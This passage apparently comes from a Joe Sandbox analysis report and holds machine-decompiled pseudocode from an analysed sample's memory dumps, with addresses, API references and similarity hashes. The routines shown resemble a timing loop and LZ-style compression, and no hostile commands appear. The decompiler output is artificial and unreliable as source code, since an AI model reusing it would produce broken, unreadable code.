                          				if((_t11 * 0x00000008 & 0x000007f8) != 0) {
                          					_t19 =  ~((_t11 & 0x000000ff) << 3);
                          					do {
                          						_v16 = _v16 << 0x10;
                          						_t19 = _t19 + 1;
                          					} while (_t19 != 0);
                          				}
                          				return _t13 + _t11;
                          			}
                          0x005c8160
                          0x005c8169
                          0x005c816f
                          0x005c8171
                          0x005c8173
                          0x005c8177
                          0x005c817b
                          0x005c817f
                          0x005c8194
                          0x005c819c
                          0x005c819e
                          0x005c819e
                          0x005c81a3
                          0x005c81a3
                          0x005c819e
                          0x005c81ad

                          APIs
                          • GetTickCount.KERNEL32(?,?,?,005C9394), ref: 005C8169
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID:
                          • API String ID: 536389180-0
                          • Opcode ID: bc2a842c14334f88e64a9bb6896613cda198da0f8513d241769b183ff202d201
                          • Instruction ID: 791a9729bd2c524664e1300e2e17d8cabedee07cbb05ae7457865d568a56a4ff
                          • Opcode Fuzzy Hash: bc2a842c14334f88e64a9bb6896613cda198da0f8513d241769b183ff202d201
                          • Instruction Fuzzy Hash: F4E06D705197055FE704DB1CD804769BBE2F7C4310F44CA6EE8AE836A4FB759810DA82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D35E0() {
                          				signed int _t144;
                          				signed int _t147;
                          				signed int _t157;
                          				signed int _t158;
                          				signed int _t162;
                          				signed int _t165;
                          				signed char _t170;
                          				signed char _t172;
                          				void* _t181;
                          				signed char _t186;
                          				signed int _t187;
                          				signed char _t198;
                          				signed char _t205;
                          				signed char _t221;
                          				signed int _t224;
                          				void* _t225;
                          				void* _t226;
                          				signed int _t227;
                          				signed int _t229;
                          				signed char _t231;
                          				signed int _t236;
                          				signed char _t237;
                          				signed int _t238;
                          				signed int _t245;
                          				signed int _t251;
                          				signed char _t252;
                          				signed char _t257;
                          				signed char _t262;
                          				signed int _t266;
                          				signed int _t273;
                          				signed int _t274;
                          				signed int _t275;
                          				signed int _t276;
                          				signed char _t278;
                          				signed int _t279;
                          				signed int _t280;
                          				signed int _t281;
                          				unsigned int _t282;
                          				signed int _t283;
                          				signed int _t284;
                          				signed int _t285;
                          				signed int _t286;
                          				signed char _t290;
                          				signed int _t291;
                          				signed int _t301;
                          				signed int _t302;
                          				signed char _t303;
                          				signed int _t305;
                          				signed char _t306;
                          				signed int _t311;
                          				signed int* _t313;
                          				signed char _t316;
                          				signed char _t317;
                          				signed char _t318;
                          				signed int _t319;
                          				signed char _t320;
                          				signed int _t324;
                          				signed int _t326;
                          				signed char* _t327;
                          				signed char _t328;
                          				signed int _t330;
                          				signed char _t331;
                          				signed char* _t335;
                          				signed char _t336;
                          				signed int* _t338;
                          				void* _t342;
                          
                          				_t319 = _t338[0xd];
                          				_t306 = _t338[0xe];
                          				_t144 = _t338[0xf];
                          				_t224 = _t338[0xc];
                          				_t231 = _t306;
                          				_t266 = _t319;
                          				if(_t319 >= 0xe) {
                          					_t302 = _t224 + 4;
                          					_t237 = _t306;
                          					_t338[3] = _t224;
                          					_t338[6] = _t224 + _t319 - 0xd;
                          					_t338[5] = _t224 + _t319;
                          					do {
                          						_t227 = _t338[0x10];
                          						_t303 = _t302 + 4;
                          						_t338[1] = _t237;
                          						do {
                          							_t238 =  *(_t303 - 1) & 0x000000ff;
                          							_t157 =  *(_t303 - 2) & 0x000000ff;
                          							_t35 = _t303 - 4; // -8
                          							_t273 = _t35;
                          							 *_t338 = _t273;
                          							_t338[2] = _t238;
                          							_t338[4] = _t157;
                          							_t245 = (( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) << 5) + ( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) >> 5;
                          							_t324 = _t245 & 0x00003fff;
                          							_t158 =  *(_t227 + _t324 * 4);
                          							if(_t158 >= _t338[0xc]) {
                          								_t274 = _t273 - _t158;
                          								_t41 = _t274 - 1; // -9
                          								__eflags = _t41 - 0xbffe;
                          								if(_t41 <= 0xbffe) {
                          									__eflags = _t274 - 0x801;
                          									_t229 = _t274;
                          									if(_t274 >= 0x801) {
                          										_t275 = _t338[2];
                          										_t311 = _t338[0x10];
                          										__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
                          										if( *((intOrPtr*)(_t158 + 3)) != _t275) {
                          											_t324 = _t245 & 0x000007ff ^ 0x0000201f;
                          											_t158 =  *(_t311 + _t324 * 4);
                          											__eflags = _t158 - _t338[0xc];
                          											if(_t158 < _t338[0xc]) {
                          												goto L23;
                          											} else {
                          												_t229 =  *_t338 - _t158;
                          												_t53 = _t229 - 1; // -9
                          												__eflags = _t53 - 0xbffe;
                          												if(_t53 <= 0xbffe) {
                          													__eflags = _t229 - 0x801;
                          													if(_t229 < 0x801) {
                          														goto L18;
                          													} else {
                          														__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
                          														if( *((intOrPtr*)(_t158 + 3)) == _t275) {
                          															goto L18;
                          														} else {
                          															goto L23;
                          														}
                          													}
                          												} else {
                          													goto L23;
                          												}
                          											}
                          										} else {
                          											goto L18;
                          										}
                          									} else {
                          										_t311 = _t338[0x10];
                          										L18:
                          										__eflags = ( *_t158 & 0x0000ffff) -  *(_t303 - 4);
                          										if(( *_t158 & 0x0000ffff) !=  *(_t303 - 4)) {
                          											goto L23;
                          										} else {
                          											__eflags =  *((intOrPtr*)(_t158 + 2)) - _t338[4];
                          											if( *((intOrPtr*)(_t158 + 2)) != _t338[4]) {
                          												goto L23;
                          											} else {
                          												_t338[4] = _t158;
                          												_t162 =  *_t338;
                          												_t251 = _t338[3];
                          												_t338[2] = _t229;
                          												 *(_t311 + _t324 * 4) = _t162;
                          												_t278 = _t162 - _t251;
                          												__eflags = _t278;
                          												if(_t278 <= 0) {
                          													 *_t338 = _t251;
                          													_t252 = _t338[1];
                          													_t224 = _t338[0xc];
                          												} else {
                          													_t262 = _t338[1];
                          													_t224 = _t338[0xc];
                          													__eflags = _t278 - 3;
                          													_t317 = _t278;
                          													if(_t278 > 3) {
                          														__eflags = _t278 - 0x12;
                          														if(_t278 > 0x12) {
                          															_t290 = _t278 - 0x12;
                          															_t335 = _t262 + 1;
                          															 *_t262 = 0;
                          															__eflags = _t290 - 0x100;
                          															if(_t290 >= 0x100) {
                          																E005D6610(_t335, 0, ((0xfffffeee - _t338[3] + _t162) * 0x80808081 >> 0x20 >> 7) + 1);
                          																_t338 =  &(_t338[3]);
                          																_t290 = (( *_t338 - 0x112 - _t338[3]) * 0x80808081 >> 0x20 >> 7) - (0x80808081 << 8) +  *_t338 - 0x111 - _t338[3];
                          																__eflags = _t290;
                          																_t221 =  &(_t335[0xffffffff80808081]);
                          																_t335 = _t338[1] + 0xffffffff80808083;
                          																_t262 = _t221;
                          															}
                          															_t262 = _t262 + 2;
                          															__eflags = _t262;
                          															 *_t335 = _t290;
                          														} else {
                          															 *_t262 = _t278 + 0xfd;
                          															_t262 = _t262 + 1;
                          														}
                          													} else {
                          														 *(_t262 - 2) =  *(_t262 - 2) | _t278;
                          													}
                          													_t291 = _t338[3];
                          													_t205 = 0;
                          													__eflags = 0;
                          													_t336 = _t317;
                          													do {
                          														_t318 = _t262;
                          														 *((char*)(_t318 + _t205)) =  *((intOrPtr*)(_t291 + _t205));
                          														_t205 = _t205 + 1;
                          														_t262 = _t318;
                          														__eflags = _t336 - _t205;
                          													} while (_t336 != _t205);
                          													_t252 = _t262 + _t336;
                          													__eflags = _t252;
                          												}
                          												_t279 = _t338[4];
                          												__eflags =  *((intOrPtr*)(_t279 + 3)) -  *(_t303 - 1);
                          												if( *((intOrPtr*)(_t279 + 3)) !=  *(_t303 - 1)) {
                          													L57:
                          													_t302 = _t303 - 1;
                          													_t280 = _t338[2];
                          													_t306 = _t338[0xe];
                          													_t165 = _t302 -  *_t338;
                          													__eflags = _t280 - 0x800;
                          													if(_t280 > 0x800) {
                          														__eflags = _t280 - 0x4000;
                          														if(_t280 > 0x4000) {
                          															_t281 = _t280 + 0xffffc000;
                          															_t327 = _t252;
                          															_t257 =  &(_t327[1]);
                          															__eflags = _t257;
                          															 *_t327 = _t165 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
                          														} else {
                          															_t281 = _t280 - 1;
                          															_t172 = _t165 + 0x000000fe | 0x00000020;
                          															__eflags = _t172;
                          															goto L61;
                          														}
                          														goto L63;
                          													} else {
                          														_t283 = _t280 - 1;
                          														_t328 = _t252;
                          														_t282 = _t283 >> 3;
                          														_t257 = _t328;
                          														 *_t328 = (_t165 << 5) + 0xe0 + (_t283 & 0x00000007) * 4;
                          													}
                          												} else {
                          													__eflags =  *((intOrPtr*)(_t279 + 4)) -  *_t303;
                          													if( *((intOrPtr*)(_t279 + 4)) !=  *_t303) {
                          														_t303 = _t303 + 1;
                          														goto L57;
                          													} else {
                          														__eflags =  *((intOrPtr*)(_t279 + 5)) -  *(_t303 + 1);
                          														if( *((intOrPtr*)(_t279 + 5)) !=  *(_t303 + 1)) {
                          															_t303 = _t303 + 2;
                          															goto L57;
                          														} else {
                          															__eflags =  *((intOrPtr*)(_t279 + 6)) -  *(_t303 + 2);
                          															if( *((intOrPtr*)(_t279 + 6)) !=  *(_t303 + 2)) {
                          																_t303 = _t303 + 3;
                          																goto L57;
                          															} else {
                          																__eflags =  *((intOrPtr*)(_t279 + 7)) -  *(_t303 + 3);
                          																if( *((intOrPtr*)(_t279 + 7)) !=  *(_t303 + 3)) {
                          																	_t303 = _t303 + 4;
                          																	__eflags = _t303;
                          																	goto L57;
                          																} else {
                          																	__eflags =  *((intOrPtr*)(_t279 + 8)) -  *(_t303 + 4);
                          																	_t303 = _t303 + 5;
                          																	if(__eflags != 0) {
                          																		goto L57;
                          																	} else {
                          																		_t284 = _t338[5];
                          																		__eflags = _t303 - _t284;
                          																		if(_t303 < _t284) {
                          																			_t316 = _t338[4] + 9;
                          																			__eflags = _t316;
                          																			while(1) {
                          																				__eflags =  *_t316 -  *_t303;
                          																				if( *_t316 !=  *_t303) {
                          																					goto L50;
                          																				}
                          																				_t303 = _t303 + 1;
                          																				_t316 = _t316 + 1;
                          																				__eflags = _t303 - _t284;
                          																				if(_t303 < _t284) {
                          																					continue;
                          																				}
                          																				goto L50;
                          																			}
                          																		}
                          																		L50:
                          																		_t285 = _t338[2];
                          																		_t181 = _t303 -  *_t338;
                          																		__eflags = _t285 - 0x4000;
                          																		if(_t285 > 0x4000) {
                          																			_t306 = _t338[0xe];
                          																			_t281 = _t285 + 0xffffc000;
                          																			__eflags = _t181 - 9;
                          																			if(_t181 > 9) {
                          																				_t338[2] = _t281;
                          																				_t286 = _t181 + 0xfffffff7;
                          																				_t186 = _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
                          																				__eflags = _t186;
                          																				goto L6;
                          																			} else {
                          																				_t172 = _t181 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
                          																				L61:
                          																				 *_t252 = _t172;
                          																				_t257 = _t252 + 1;
                          																			}
                          																		} else {
                          																			_t306 = _t338[0xe];
                          																			__eflags = _t181 - 0x21;
                          																			_t338[2] = _t285 - 1;
                          																			if(_t181 > 0x21) {
                          																				_t286 = _t181 + 0xffffffdf;
                          																				_t186 = 0x20;
                          																				L6:
                          																				 *_t252 = _t186;
                          																				_t313 = _t252 + 1;
                          																				__eflags = _t286 - 0x100;
                          																				_t187 = _t286;
                          																				if(_t286 >= 0x100) {
                          																					 *_t338 = _t187;
                          																					_t330 = ( *_t338 - 0x100) * 0x80808081 >> 0x20 >> 7;
                          																					_t20 = _t330 + 1; // 0x80808082
                          																					_t338[4] = _t252;
                          																					E005D6610(_t313, 0, _t20);
                          																					_t338 =  &(_t338[3]);
                          																					_t331 = _t330 - (_t330 << 8);
                          																					__eflags = _t331;
                          																					 *_t338 =  *_t338 + _t331 - 0xff;
                          																					_t198 = _t313 + _t330;
                          																					_t313 = _t338[1] + _t330 + 2;
                          																					_t252 = _t198;
                          																					_t187 =  *_t338;
                          																				}
                          																				 *_t313 = _t187;
                          																				_t306 = _t338[0xe];
                          																				_t257 = _t252 + 2;
                          																				__eflags = _t257;
                          																				goto L9;
                          																			} else {
                          																				 *_t252 = _t181 + 0x000000fe | 0x00000020;
                          																				_t257 = _t252 + 1;
                          																				L9:
                          																				_t281 = _t338[2];
                          																				goto L63;
                          																			}
                          																			goto L64;
                          																		}
                          																		L63:
                          																		_t282 = _t281 >> 6;
                          																		_t170 = _t281 << 2;
                          																		__eflags = _t170;
                          																		 *_t257 = _t170;
                          																	}
                          																}
                          															}
                          														}
                          													}
                          												}
                          												goto L64;
                          											}
                          										}
                          									}
                          								} else {
                          									_t311 = _t338[0x10];
                          									goto L23;
                          								}
                          							} else {
                          								_t311 = _t227;
                          								goto L23;
                          							}
                          							L67:
                          							_t266 = _t276 - _t305;
                          							 *_t326 = _t231 - _t306;
                          							_t144 = _t326;
                          							_t319 = _t338[0xd];
                          							goto L68;
                          							L23:
                          							_t54 = _t303 + 1; // -3
                          							_t227 = _t311;
                          							_t342 = _t303 + 0xfffffffd - _t338[6];
                          							_t303 = _t54;
                          							 *(_t311 + _t324 * 4) =  *_t338;
                          						} while (_t342 < 0);
                          						_t305 = _t338[3];
                          						_t326 = _t338[0xf];
                          						_t306 = _t338[0xe];
                          						_t276 = _t338[5];
                          						_t231 = _t338[1];
                          						_t224 = _t338[0xc];
                          						goto L67;
                          						L64:
                          						 *(_t257 + 1) = _t282;
                          						_t237 = _t257 + 2;
                          						__eflags = _t302 - _t338[6];
                          						_t326 = _t338[0xf];
                          						_t276 = _t338[5];
                          						_t338[3] = _t302;
                          					} while (_t302 < _t338[6]);
                          					goto L67;
                          				}
                          				L68:
                          				if(_t266 != 0) {
                          					_t301 = _t266;
                          					if(_t231 != _t306 || _t266 > 0xee) {
                          						__eflags = _t266 - 3;
                          						if(_t266 > 3) {
                          							__eflags = _t266 - 0x12;
                          							if(_t266 > 0x12) {
                          								_t225 = _t266 - 0x12;
                          								 *_t231 = 0;
                          								__eflags = _t225 - 0x100;
                          								if(_t225 >= 0x100) {
                          									_t338[1] = _t231;
                          									__eflags = 0x80808081;
                          									E005D6610(_t338[1] + 1, 0, ((_t266 - 0x112) * 0x80808081 >> 0x20 >> 7) + 1);
                          									_t236 = _t338[4];
                          									_t338 =  &(_t338[3]);
                          									do {
                          										_t225 = _t225 + 0xffffff01;
                          										_t236 = _t236 + 1;
                          										__eflags = _t225 - 0xff;
                          									} while (_t225 > 0xff);
                          									_t266 = _t301;
                          								}
                          								 *(_t231 + 1) = _t225;
                          								_t224 = _t338[0xc];
                          								_t231 = _t231 + 2;
                          								__eflags = _t231;
                          							} else {
                          								 *_t231 = _t266 + 0xfd;
                          								_t231 = _t231 + 1;
                          							}
                          						} else {
                          							 *(_t231 - 2) =  *(_t231 - 2) | _t266;
                          						}
                          					} else {
                          						_t231 = _t306 + 1;
                          						 *_t306 = _t266 + 0x11;
                          					}
                          					_t226 = _t224 + _t319;
                          					_t320 = _t231;
                          					_t147 =  ~_t266;
                          					do {
                          						 *_t231 =  *((intOrPtr*)(_t226 + _t147));
                          						_t231 = _t231 + 1;
                          						_t147 = _t147 + 1;
                          					} while (_t147 != 0);
                          					_t144 = _t338[0xf];
                          					_t231 = _t320 + _t301;
                          				}
                          				 *_t231 = 0x11;
                          				 *(_t231 + 2) = 0;
                          				 *_t144 = _t231 + 3 - _t306;
                          				return 0;
                          			}
                          0x005d35e7
                          0x005d35eb
                          0x005d35ef
                          0x005d35f3
                          0x005d35fa
                          0x005d35fc
                          0x005d35fe
                          0x005d360b
                          0x005d360e
                          0x005d3610
                          0x005d3614
                          0x005d3618
                          0x005d36d7
                          0x005d36d7
                          0x005d36db
                          0x005d36de
                          0x005d36e2
                          0x005d36e2
                          0x005d36e6
                          0x005d36f2
                          0x005d36f2
                          0x005d36f5
                          0x005d36f8
                          0x005d36ff
                          0x005d371a
                          0x005d371f
                          0x005d3725
                          0x005d372a
                          0x005d3730
                          0x005d3732
                          0x005d3735
                          0x005d373b
                          0x005d3743
                          0x005d3749
                          0x005d374b
                          0x005d3753
                          0x005d3757
                          0x005d375b
                          0x005d375e
                          0x005d377c
                          0x005d3782
                          0x005d3785
                          0x005d3789
                          0x00000000
                          0x005d378b
                          0x005d378e
                          0x005d3790
                          0x005d3793
                          0x005d3799
                          0x005d37ba
                          0x005d37c0
                          0x00000000
                          0x005d37c2
                          0x005d37c2
                          0x005d37c5
                          0x00000000
                          0x005d37c7
                          0x00000000
                          0x005d37c7
                          0x005d37c5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d3799
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d374d
                          0x005d374d
                          0x005d3760
                          0x005d3763
                          0x005d3767
                          0x00000000
                          0x005d3769
                          0x005d376d
                          0x005d3770
                          0x00000000
                          0x005d3772
                          0x005d37c9
                          0x005d37cd
                          0x005d37d0
                          0x005d37d4
                          0x005d37da
                          0x005d37dd
                          0x005d37df
                          0x005d37e1
                          0x005d37fa
                          0x005d37fd
                          0x005d3801
                          0x005d37e3
                          0x005d37e3
                          0x005d37e7
                          0x005d37eb
                          0x005d37ee
                          0x005d37f0
                          0x005d380a
                          0x005d380d
                          0x005d3818
                          0x005d381b
                          0x005d381e
                          0x005d3821
                          0x005d3827
                          0x005d3846
                          0x005d384b
                          0x005d3883
                          0x005d3883
                          0x005d3885
                          0x005d3887
                          0x005d3889
                          0x005d3889
                          0x005d388b
                          0x005d388b
                          0x005d388e
                          0x005d380f
                          0x005d3813
                          0x005d3815
                          0x005d3815
                          0x005d37f2
                          0x005d37f2
                          0x005d37f2
                          0x005d3891
                          0x005d3895
                          0x005d3895
                          0x005d3897
                          0x005d3899
                          0x005d3899
                          0x005d389e
                          0x005d38a1
                          0x005d38a2
                          0x005d38a4
                          0x005d38a4
                          0x005d38a8
                          0x005d38a8
                          0x005d38a8
                          0x005d38aa
                          0x005d38b1
                          0x005d38b4
                          0x005d3942
                          0x005d3942
                          0x005d3943
                          0x005d3947
                          0x005d394d
                          0x005d3950
                          0x005d3956
                          0x005d3974
                          0x005d397a
                          0x005d3986
                          0x005d398c
                          0x005d39a1
                          0x005d39a1
                          0x005d39a2
                          0x005d397c
                          0x005d397e
                          0x005d397f
                          0x005d397f
                          0x00000000
                          0x005d397f
                          0x00000000
                          0x005d3958
                          0x005d3958
                          0x005d3959
                          0x005d3960
                          0x005d396d
                          0x005d396f
                          0x005d396f
                          0x005d38ba
                          0x005d38bd
                          0x005d38bf
                          0x005d3932
                          0x00000000
                          0x005d38c1
                          0x005d38c4
                          0x005d38c7
                          0x005d3935
                          0x00000000
                          0x005d38c9
                          0x005d38cc
                          0x005d38cf
                          0x005d393a
                          0x00000000
                          0x005d38d1
                          0x005d38d4
                          0x005d38d7
                          0x005d393f
                          0x005d393f
                          0x00000000
                          0x005d38d9
                          0x005d38dc
                          0x005d38df
                          0x005d38e2
                          0x00000000
                          0x005d38e4
                          0x005d38e4
                          0x005d38e8
                          0x005d38ea
                          0x005d38f0
                          0x005d38f0
                          0x005d38f3
                          0x005d38f5
                          0x005d38f7
                          0x00000000
                          0x00000000
                          0x005d38f9
                          0x005d38fa
                          0x005d38fb
                          0x005d38fd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d38fd
                          0x005d38f3
                          0x005d38ff
                          0x005d3901
                          0x005d3905
                          0x005d3908
                          0x005d390e
                          0x005d3621
                          0x005d3625
                          0x005d362b
                          0x005d362e
                          0x005d3652
                          0x005d365d
                          0x005d3661
                          0x005d3661
                          0x00000000
                          0x005d3630
                          0x005d363f
                          0x005d3981
                          0x005d3981
                          0x005d3983
                          0x005d3983
                          0x005d3914
                          0x005d3914
                          0x005d3919
                          0x005d391c
                          0x005d3920
                          0x005d3649
                          0x005d364b
                          0x005d3663
                          0x005d3663
                          0x005d3665
                          0x005d3668
                          0x005d366e
                          0x005d3670
                          0x005d3672
                          0x005d3687
                          0x005d368a
                          0x005d3692
                          0x005d3696
                          0x005d369b
                          0x005d36ad
                          0x005d36ad
                          0x005d36b9
                          0x005d36bc
                          0x005d36be
                          0x005d36c0
                          0x005d36c2
                          0x005d36c2
                          0x005d36c5
                          0x005d36c7
                          0x005d36cb
                          0x005d36cb
                          0x00000000
                          0x005d3926
                          0x005d392a
                          0x005d392c
                          0x005d36ce
                          0x005d36ce
                          0x00000000
                          0x005d36ce
                          0x00000000
                          0x005d3920
                          0x005d39a5
                          0x005d39a7
                          0x005d39aa
                          0x005d39aa
                          0x005d39ad
                          0x005d39ad
                          0x005d38e2
                          0x005d38d7
                          0x005d38cf
                          0x005d38c7
                          0x005d38bf
                          0x00000000
                          0x005d38b4
                          0x005d3770
                          0x005d3767
                          0x005d373d
                          0x005d373d
                          0x00000000
                          0x005d373d
                          0x005d372c
                          0x005d372c
                          0x00000000
                          0x005d372c
                          0x005d39e5
                          0x005d39e7
                          0x005d39eb
                          0x005d39ee
                          0x005d39f0
                          0x00000000
                          0x005d379b
                          0x005d379b
                          0x005d37a4
                          0x005d37a6
                          0x005d37aa
                          0x005d37ac
                          0x005d37ac
                          0x005d39cd
                          0x005d39d1
                          0x005d39d5
                          0x005d39d9
                          0x005d39dd
                          0x005d39e1
                          0x00000000
                          0x005d39af
                          0x005d39af
                          0x005d39b2
                          0x005d39b5
                          0x005d39b9
                          0x005d39bd
                          0x005d39c1
                          0x005d39c1
                          0x00000000
                          0x005d39cb
                          0x005d39f4
                          0x005d39f6
                          0x005d39fe
                          0x005d3a00
                          0x005d3a15
                          0x005d3a18
                          0x005d3a1f
                          0x005d3a22
                          0x005d3a2d
                          0x005d3a30
                          0x005d3a33
                          0x005d3a39
                          0x005d3a3b
                          0x005d3a56
                          0x005d3a5b
                          0x005d3a60
                          0x005d3a64
                          0x005d3a67
                          0x005d3a67
                          0x005d3a6d
                          0x005d3a6e
                          0x005d3a6e
                          0x005d3a76
                          0x005d3a76
                          0x005d3a78
                          0x005d3a7b
                          0x005d3a7f
                          0x005d3a7f
                          0x005d3a24
                          0x005d3a28
                          0x005d3a2a
                          0x005d3a2a
                          0x005d3a1a
                          0x005d3a1a
                          0x005d3a1a
                          0x005d3a0a
                          0x005d3a0c
                          0x005d3a11
                          0x005d3a11
                          0x005d3a84
                          0x005d3a86
                          0x005d3a88
                          0x005d3a8a
                          0x005d3a8d
                          0x005d3a8f
                          0x005d3a90
                          0x005d3a90
                          0x005d3a93
                          0x005d3a99
                          0x005d3a99
                          0x005d3a9b
                          0x005d3aa0
                          0x005d3aa9
                          0x005d3ab4

                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
                          • Instruction ID: 27cb10d76fb471d2dcdb351f9027f008b43f2c09bc4f829d59472a899eb0c7ca
                          • Opcode Fuzzy Hash: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
                          • Instruction Fuzzy Hash: 90E1A0716082859FC725CF2CC49056ABFE2FB95310F588A6FE4C58B346E371AE46C752
                          Uniqueness
                          • Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005C2E60() {
                          				signed char _t81;
                          				intOrPtr* _t85;
                          				signed int _t91;
                          				signed int _t103;
                          				void* _t105;
                          				void* _t106;
                          				signed char _t107;
                          				signed char _t111;
                          				signed short* _t117;
                          				intOrPtr* _t121;
                          				signed int _t127;
                          				void* _t130;
                          				signed char _t131;
                          				void* _t133;
                          				signed int _t134;
                          				void* _t136;
                          				void* _t137;
                          				intOrPtr* _t138;
                          				signed int _t145;
                          				signed int _t146;
                          				void* _t151;
                          				signed int _t152;
                          				signed int _t154;
                          				signed int _t155;
                          				void* _t156;
                          				void* _t158;
                          				void* _t160;
                          				void* _t167;
                          				signed int _t168;
                          				void* _t170;
                          				signed int _t172;
                          				signed int _t173;
                          				signed int _t175;
                          				signed int _t178;
                          				void* _t182;
                          				void* _t184;
                          				void* _t185;
                          				void* _t186;
                          				void* _t187;
                          				signed int _t188;
                          				signed short* _t189;
                          				signed short* _t190;
                          				signed short* _t191;
                          				signed short* _t192;
                          				void* _t193;
                          				void* _t195;
                          				signed int _t198;
                          				signed short* _t201;
                          				signed int _t202;
                          				signed int _t203;
                          				signed short* _t204;
                          				void* _t209;
                          				signed int* _t211;
                          
                          				_t190 = _t211[8];
                          				_t134 = _t211[0xa];
                          				 *(_t211[0xb]) = 0;
                          				_t81 =  *_t190 & 0x000000ff;
                          				if(_t81 < 0x12) {
                          					_t204 = _t190;
                          					goto L8;
                          				} else {
                          					_t175 = _t81 - 0x11;
                          					_t204 =  &(_t190[0]);
                          					if(_t175 >= 4) {
                          						_t189 = _t190 + _t81 - 0x10;
                          						_t203 = _t211[0xa];
                          						_t133 = 0;
                          						do {
                          							 *((char*)(_t203 + _t133)) =  *((intOrPtr*)(_t204 + _t133));
                          							_t133 = _t133 + 1;
                          						} while (_t175 != _t133);
                          						_t172 = _t175 + _t203;
                          						_t201 = _t189;
                          						L27:
                          						_t146 =  *_t201 & 0x000000ff;
                          						if(_t146 <= 0xf) {
                          							_t192 =  &(_t201[1]);
                          							_t121 = _t172 - (_t146 >> 2) + 0xfffff7ff - ((_t201[0] & 0x000000ff) << 2);
                          							 *_t172 =  *_t121;
                          							 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t121 + 1));
                          							 *(_t172 + 2) =  *((intOrPtr*)(_t121 + 2));
                          							_t173 = _t172 + 3;
                          							L30:
                          							_t204 = _t192;
                          							L60:
                          							_t134 = _t173;
                          							_t175 =  *(_t204 - 2) & 3;
                          							if(_t175 == 0) {
                          								_t81 =  *_t204;
                          								L8:
                          								_t191 =  &(_t204[0]);
                          								_t146 = _t81 & 0x000000ff;
                          								if(_t81 > 0xf) {
                          									goto L31;
                          								} else {
                          									if(_t146 == 0) {
                          										_t131 =  *_t191;
                          										if(_t131 == 0) {
                          											_t170 = 0;
                          											do {
                          												_t131 = _t204[1];
                          												_t170 = _t170 + 0xff;
                          												_t204 =  &(_t204[0]);
                          											} while (_t131 == 0);
                          										}
                          										_t146 = 0 + (_t131 & 0x000000ff) + 0xf;
                          										_t191 =  &(_t204[1]);
                          									}
                          									_t172 = _t134 + 4;
                          									_t209 = _t146 - 1;
                          									 *_t134 =  *_t191;
                          									_t117 = _t191;
                          									_t201 =  &(_t191[2]);
                          									if(_t209 != 0) {
                          										 *_t211 = _t117;
                          										if(_t209 <= 3) {
                          											_t186 = 0;
                          											_t167 = _t146 + 3;
                          											 *_t211 =  *_t211 + _t146 + 3;
                          											do {
                          												 *((char*)(_t172 + _t186)) =  *((intOrPtr*)(_t201 + _t186));
                          												_t186 = _t186 + 1;
                          											} while (_t209 != _t186);
                          											_t201 =  *_t211;
                          											goto L25;
                          										} else {
                          											_t168 = _t146 + 0xfffffffb;
                          											_t187 = 4;
                          											_t127 = _t168 & 0xfffffffc;
                          											_t202 = _t127;
                          											_t211[2] = _t127 + 8;
                          											_t178 =  *_t211;
                          											_t211[1] = _t178 + _t127 + 8;
                          											do {
                          												_t209 = _t209 + 0xfffffffc;
                          												 *((intOrPtr*)(_t134 + _t187)) =  *((intOrPtr*)(_t178 + _t187));
                          												_t187 = _t187 + 4;
                          											} while (_t209 > 3);
                          											_t134 = _t134 + _t211[2];
                          											_t167 = _t168 - _t202;
                          											if(_t167 != 0) {
                          												_t188 = _t211[1];
                          												_t130 = 0;
                          												_t201 = _t188 + _t167;
                          												do {
                          													 *((char*)(_t134 + _t130)) =  *((intOrPtr*)(_t188 + _t130));
                          													_t130 = _t130 + 1;
                          												} while (_t167 != _t130);
                          												L25:
                          												_t145 = _t134 + _t167;
                          											} else {
                          												_t201 = _t211[1];
                          											}
                          										}
                          										_t172 = _t145;
                          									}
                          									goto L27;
                          								}
                          								goto L32;
                          							} else {
                          								goto L61;
                          							}
                          							L66:
                          						} else {
                          							_t191 =  &(_t201[0]);
                          						}
                          					} else {
                          						_t134 = _t211[0xa];
                          						L61:
                          						_t193 = _t175 - 1;
                          						_t151 = 0;
                          						do {
                          							 *((char*)(_t134 + _t151)) =  *((intOrPtr*)(_t204 + _t151));
                          							_t151 = _t151 + 1;
                          						} while (_t175 != _t151);
                          						_t146 =  *(_t204 + _t175) & 0x000000ff;
                          						_t134 = _t134 + _t175;
                          						_t191 = _t204 + _t193 + 2;
                          						L31:
                          						_t172 = _t134;
                          					}
                          				}
                          				L32:
                          				if(_t146 >= 0x40) {
                          					_t152 = (_t146 >> 5) - 1;
                          					_t204 =  &(_t191[0]);
